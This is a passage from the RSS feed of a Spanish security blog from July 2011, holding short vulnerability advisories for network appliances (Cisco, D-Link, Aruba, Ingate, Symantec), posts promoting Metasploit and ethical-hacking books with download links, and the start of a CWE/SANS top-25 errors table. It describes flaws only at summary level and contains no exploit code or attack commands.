&lt;br /&gt;
11.29.22 CVE: CVE-2011-2064&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: Cisco Content Services Gateway Malformed ICMP Messages Denial&lt;br /&gt;
of Service&lt;br /&gt;
Description: Cisco Content Services Gateway is a device used to&lt;br /&gt;
monitor network use. Cisco Content Services Gateway is exposed to a&lt;br /&gt;
denial of service issue when handling specially crafted ICMP messages.&lt;br /&gt;
Second Generation of Content Services Gateway is affected.&lt;br /&gt;
Ref:&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.cisco.com/en/US/products/products_security_advisory09186a0080b86503.shtml"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.cisco.com/en/US/products/products_security_advisory09186a0080b86503.shtml&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.23 CVE: Not Available&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: D-Link DSL-2650U Remote Denial of Service&lt;br /&gt;
Description: The D-Link DSL-2650U is an ADSL router with an 802.11g&lt;br /&gt;
wireless access point. The Web server running on the device is exposed&lt;br /&gt;
to a remote denial of service issue. The issue occurs due to the&lt;br /&gt;
improper handling of an overly large string provided to the "diagPrev"&lt;br /&gt;
parameter of the "diagpppoe.cgi" script. D-Link DSL-2650U 1.20 is&lt;br /&gt;
affected; other versions may also be vulnerable.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/bid/48612/discuss"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/bid/48612/discuss&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.24 CVE: Not Available&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: Aruba Networks ArubaOS HTTP Response Splitting and HTML&lt;br /&gt;
Injection Vulnerabilities&lt;br /&gt;
Description: Aruba OS is an operating system used by various Aruba&lt;br /&gt;
Networks network devices, including the Aruba Mobility Controller.&lt;br /&gt;
Aruba Networks ArubaOS is exposed to multiple input validation issues.&lt;br /&gt;
An HTML injection issue affects the reporting feature of ArubaOS&lt;br /&gt;
and AirWave Administration WebUIs. An HTTP response splitting issue&lt;br /&gt;
affects the Captive Portal Web Interface. ArubaOS 3.3.X, 3.4.X, 5.0.X,&lt;br /&gt;
6.0.X, 2.4.X-FIPS, 3.3.X-FIPS, 3.4.X-FIPS and AirWave 7.2.X are&lt;br /&gt;
affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.securityfocus.com/archive/1/518751"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.securityfocus.com/archive/1/518751&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.25 CVE: Not Available&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: Ingate Firewall and SIParator SIP Module Remote Denial of&lt;br /&gt;
Service&lt;br /&gt;
Description: Ingate Firewalls are hardware firewall devices that&lt;br /&gt;
support Session Initiation Protocol (SIP) via SIParator SIP-based&lt;br /&gt;
communication devices. Ingate Firewall and SIParator are exposed to a&lt;br /&gt;
denial of service issue. The issue occurs when processing SIP requests&lt;br /&gt;
that contain multiple Transport Layer Security destinations.&lt;br /&gt;
Ingate SIParator 4.9.1 and prior are affected.&lt;br /&gt;
Ref: &lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.ingate.com/Relnote.php?ver=492"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.ingate.com/Relnote.php?ver=492&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
11.29.26 CVE: CVE-2011-0549&lt;br /&gt;
Platform: Network Device&lt;br /&gt;
Title: Symantec Web Gateway Management GUI SQL Injection Vulnerability&lt;br /&gt;
Description: Symantec Web Gateway is a web security gateway appliance.&lt;br /&gt;
The device is exposed to an SQL injection issue because it fails to&lt;br /&gt;
sufficiently sanitize user-supplied data passed to the management GUI.&lt;br /&gt;
Versions prior to Symantec Web Gateway 5.0.1 are vulnerable.&lt;br /&gt;
Ref:&lt;br /&gt;
&lt;/span&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: ES; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;a href="http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;amp;pvid=security_advisory&amp;amp;year=2011&amp;amp;suid=20110707_00"&gt;&lt;span lang="EN-US" style="mso-ansi-language: EN-US;"&gt;http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&amp;amp;pvid=security_advisory&amp;amp;year=2011&amp;amp;suid=20110707_00&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-language: AR-SA; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"&gt;&lt;br /&gt;
______________________________________________________________________&lt;br /&gt;
&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br style="mso-special-character: line-break;" /&gt; &lt;!--[endif]--&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-2885138405017572264?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/resumen-de-vulnerabilidades-semana-29.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-2906391817962397662</guid><pubDate>Wed, 13 Jul 2011 01:26:00 +0000</pubDate><atom:updated>2011-07-12T21:26:09.953-04:00</atom:updated><title>"EL LIBRO" de MetaSploit Framework</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Esto es para que disfruten los pentester y los nuevos ethicals que quieran comenzar a utilizar este “Increíble” framework de trabajo… bueno les dejo la noticia recién salida del horno…&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Offensive Security is happy to announce the availability of&lt;/span&gt;&lt;/span&gt;&lt;span class="apple-converted-space"&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;a href="http://www.amazon.com/Metasploit-Penetration-Testers-David-Kennedy/dp/159327288X/ref=sr_1_1?ie=UTF8&amp;amp;qid=1310486521&amp;amp;sr=8-1%3E%3Cspan%20style=" target="_blank"&gt;&lt;strong&gt;&lt;span lang="EN-US" style="color: #114170; font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Metasploit, The Penetration Tester’s Guide&lt;/span&gt;&lt;/strong&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="apple-converted-space"&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="apple-style-span"&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;– A new book by by Dave Kennedy (ReL1K), Devon Kearns (dookie), Jim O’Gorman (_Elwood_), and Mati Aharoni (muts). The book is released through No Starch Press and will begin appearing on store shelves July 19.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;The goals of the book are to provide a single point of reference for the Metasploit Framework which doesn’t quickly become outdated and to provide an in depth resource for penetration testers who wish to understand the Framework inside out. The book covers everything from Metasploit basics to fuzzing, exploit development, custom module creation, writing post exploitation modules and meterpreter kung-fu.&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span style="color: black; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;&lt;br /&gt;
Learn how to:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Find and exploit unmaintained, misconfigured, and unpatched systems&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Perform reconnaissance and find valuable information about your target&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Bypass anti-virus technologies and circumvent security controls&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Integrate Nmap, NeXpose, and Nessus with Metasploit to automate discovery&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Use the Meterpreter shell to launch further attacks from inside the network&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Harness standalone Metasploit utilities, third-party tools, and plug-ins&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin-left: 47.25pt; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list 36.0pt; text-indent: -18.0pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang="EN-US" style="color: black; font-family: Symbol; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol; mso-fareast-language: ES;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font: 7.0pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Learn how to write your own Meterpreter post exploitation modules and scripts&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; mso-outline-level: 1;"&gt;&lt;b&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES; mso-font-kerning: 18.0pt;"&gt;&lt;br /&gt;
Table of Contents&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"&gt;&lt;span lang="EN-US" style="color: black; font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: ES;"&gt;Chapter 1: The Absolute Basics of Penetration Testing&lt;br /&gt;
Chapter 2: Metasploit Basics&lt;br /&gt;
Chapter 3: Intelligence Gathering&lt;br /&gt;
Chapter 4: Vulnerability Scanning&lt;br /&gt;
Chapter 5: The Joy of Exploitation&lt;br /&gt;
Chapter 6: Meterpreter&lt;br /&gt;
Chapter 7: Avoiding Detection&lt;br /&gt;
Chapter 8: Exploitation Using Client-side Attacks&lt;br /&gt;
Chapter 9: Metasploit Auxiliary Modules&lt;br /&gt;
Chapter 10: The Social-Engineer Toolkit&lt;br /&gt;
Chapter 11: Fast-Track&lt;br /&gt;
Chapter 13: Building Your Own Module&lt;br /&gt;
Chapter 14: Creating Your Own Exploits&lt;br /&gt;
Chapter 15: Porting Exploits to the Metasploit Framework&lt;br /&gt;
Chapter 16: Meterpreter Scripting&lt;br /&gt;
Chapter 17: Simulated Penetration Test&lt;br /&gt;
Appendix A: Configuring Your Target Machines&lt;br /&gt;
Appendix B: Cheat Sheet&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;br /&gt;
&lt;b&gt;Download:&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal"&gt;&lt;span class="apple-style-span"&gt;&lt;span style="color: #000066; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;a href="http://www.4shared.com/document/O64z3vVt/Metasploit_1_.html" target="_blank"&gt;&lt;span lang="EN-US" style="color: #114170; mso-ansi-language: EN-US;"&gt;http://www.4shared.com&lt;/span&gt;&lt;span lang="EN-US" style="color: #114170; mso-ansi-language: EN-US;"&gt;/&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span lang="EN-US" style="color: #114170; mso-ansi-language: EN-US;"&gt;document/O64z3vVt/Metasploit&lt;/span&gt;&lt;span lang="EN-US" style="color: #114170; mso-ansi-language: EN-US;"&gt;_&lt;/span&gt;&lt;wbr&gt;&lt;/wbr&gt;&lt;span lang="EN-US" style="color: #114170; mso-ansi-language: EN-US;"&gt;1_.html&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-2906391817962397662?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/el-libro-de-metasploit-framework.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-7205244039294214699</guid><pubDate>Tue, 12 Jul 2011 18:52:00 +0000</pubDate><atom:updated>2011-07-12T14:52:07.120-04:00</atom:updated><title>Libro Hacking Ético Gratis</title><description>&lt;div class="mobile-photo"&gt;&lt;/div&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Siempre es agradable difundir buen material, y aparte de forma gratuita, y hoy desde &lt;a href="http://www.dragonjar.org/"&gt;DragonJAR&lt;/a&gt; nos hacen llegar este material realmente interesante para consultores de seguridad TI.&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Hace 3 años Carlos Tori, reconocido profesional Argentino de la seguridad informática, presentó en sociedad su libro “Hacking Ético”, basado en su experiencia y conocimiento del tema, el libro ayuda a sus lectores a ingresar en el mundo del Hacking Ético presentando en los conceptos básicos más importantes, de una forma práctica y eficiente, sin olvidar presentar la profundidad en cada tema.&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Carlos Tori, anuncia que por diferentes motivos ha decidido publicar gratuitamente su obra.&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;&lt;b&gt;Puedes descargarlo en tu equipo desde el mirror:&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h2&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: minor-latin;"&gt;&lt;a href="http://www.4shared.com/file/yxDJ4VYZ/Hacking_Etico_-_Carlos_Tori.html" target="_blank"&gt;Descargar Libro Hacking Ético de Carlos Tori Gratis&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h2&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5967737507322085400-7205244039294214699?l=pramirezh.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><link>http://pramirezh.blogspot.com/2011/07/libro-hacking-etico-gratis.html</link><author>noreply@blogger.com (Pablo Ramirez Hoffmann)</author></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5967737507322085400.post-3006440703964479539</guid><pubDate>Mon, 11 Jul 2011 14:53:00 +0000</pubDate><atom:updated>2011-07-11T10:53:36.263-04:00</atom:updated><title>Los 25 errores más peligrosos en Desarrollo 2011</title><description>&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: x-small;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: 0.0001pt; margin-left: 0cm; margin-right: 0cm; margin-top: 0cm;"&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: 0.0001pt; margin-left: 0cm; margin-right: 0cm; margin-top: 0cm;"&gt;&lt;/div&gt;&lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: x-small;"&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;Como el título indica, esta es la lista que este año han creado CWE/SANS sobre los errores más peligrosos que cometemos los programadores en este año 2011.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Calibri, sans-serif; font-size: x-small;"&gt;  &lt;div style="line-height: 13.5pt; margin-bottom: .0001pt; margin: 0cm;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table border="1" cellpadding="0" class="MsoNormalTable" id="Detail" style="border: outset 1.5pt; mso-cellspacing: 1.5pt; mso-padding-alt: 1.5pt 1.5pt 1.5pt 1.5pt; mso-yfti-tbllook: 1184; width: 88.46%;"&gt;&lt;thead&gt;
&lt;tr style="mso-yfti-firstrow: yes; mso-yfti-irow: 0;"&gt;    &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;    &lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Pos&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;    &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;    &lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Punt&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;    &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;    &lt;div align="center" class="MsoNormal" style="text-align: center;"&gt;&lt;b&gt;&lt;span style="font-size: 